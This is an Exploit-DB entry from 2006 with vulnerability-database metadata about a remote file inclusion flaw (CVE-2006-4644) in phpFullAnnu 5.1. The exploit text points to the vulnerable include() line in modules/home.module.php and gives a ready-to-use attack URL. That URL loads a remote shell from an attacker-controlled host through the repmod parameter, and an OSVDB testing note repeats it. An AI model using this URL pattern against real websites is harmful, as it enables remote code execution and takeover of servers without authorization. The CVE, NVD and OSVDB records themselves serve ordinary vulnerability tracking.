ID EDB-ID:2313
Type exploitdb
Reporter SHiKaA
Modified 2006-09-06T00:00:00
Description
phpFullAnnu <= 5.1 (repmod) Remote File Include Vulnerability. CVE-2006-4644. Webapps exploit for php platform
#==============================================================================================
#phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://pfa.netsliver.com/download/phpfullannu-v5.1.zip
#
#Version : v5.1
#
#================================================================================================
#Bug in : modules/home.module.php
#
#Vlu Code :
#--------------------------------
# include($repmod.'linksdirect.module.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.COM?
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# Special Thx To : Str0ke
==================================================================================================
# milw0rm.com [2006-09-06]
{"id": "EDB-ID:2313", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpFullAnnu <= 5.1 repmod Remote File Include Vulnerability", "description": "phpFullAnnu <= 5.1 (repmod) Remote File Include Vulnerability. CVE-2006-4644. Webapps exploit for php platform", "published": "2006-09-06T00:00:00", "modified": "2006-09-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2313/", "reporter": "SHiKaA", "references": [], "cvelist": ["CVE-2006-4644"], "lastseen": "2016-01-31T15:59:16", "viewCount": 6, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T15:59:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4644"]}, {"type": "osvdb", "idList": ["OSVDB:28574"]}], "modified": "2016-01-31T15:59:16", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/2313/", "sourceData": "#==============================================================================================\n#phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit\n#===============================================================================================\n# \n#Critical Level : Dangerous \n# \n#Venedor site : http://pfa.netsliver.com/download/phpfullannu-v5.1.zip \n# \n#Version : v5.1 \n# \n#================================================================================================\n#Bug in : modules/home.module.php\n#\n#Vlu Code :\n#--------------------------------\n# include($repmod.'linksdirect.module.php');\n#\n#================================================================================================\n#\n#Exploit :\n#--------------------------------\n#\n#http://sitename.com/[Script Path]/modules/home.module.php?repmod=http://SHELLURL.COM?\n#\n#\n#================================================================================================\n#Discoverd By : SHiKaA\n#\n#Conatact : SHiKaA-[at]hotmail.com\n#\n#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd\n# Special Thx To : Str0ke\n==================================================================================================\n\n# milw0rm.com [2006-09-06]\n", "osvdbidlist": ["28574"]}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "PHP remote file inclusion vulnerability in modules/home.module.php in phpFullAnnu 5.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the repmod parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-08T21:04:00", "title": "CVE-2006-4644", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4644"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:phpfullannu:phpfullannu:5.1"], "id": "CVE-2006-4644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4644", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpfullannu:phpfullannu:5.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4644"], "edition": 1, "description": "## Manual Testing Notes\nhttp://[target]/[Script Path]/modules/home.module.php?repmod=http://[attacker]?\n## References:\nVendor URL: http://pfa.netsliver.com/\n[Secunia Advisory ID:21805](https://secuniaresearch.flexerasoftware.com/advisories/21805/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2313\nFrSIRT Advisory: ADV-2006-3493\n[CVE-2006-4644](https://vulners.com/cve/CVE-2006-4644)\nBugtraq ID: 19875\n", "modified": "2006-09-06T05:18:59", "published": "2006-09-06T05:18:59", "href": "https://vulners.com/osvdb/OSVDB:28574", "id": "OSVDB:28574", "type": "osvdb", "title": "phpFullAnnu home.module.php repmod Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
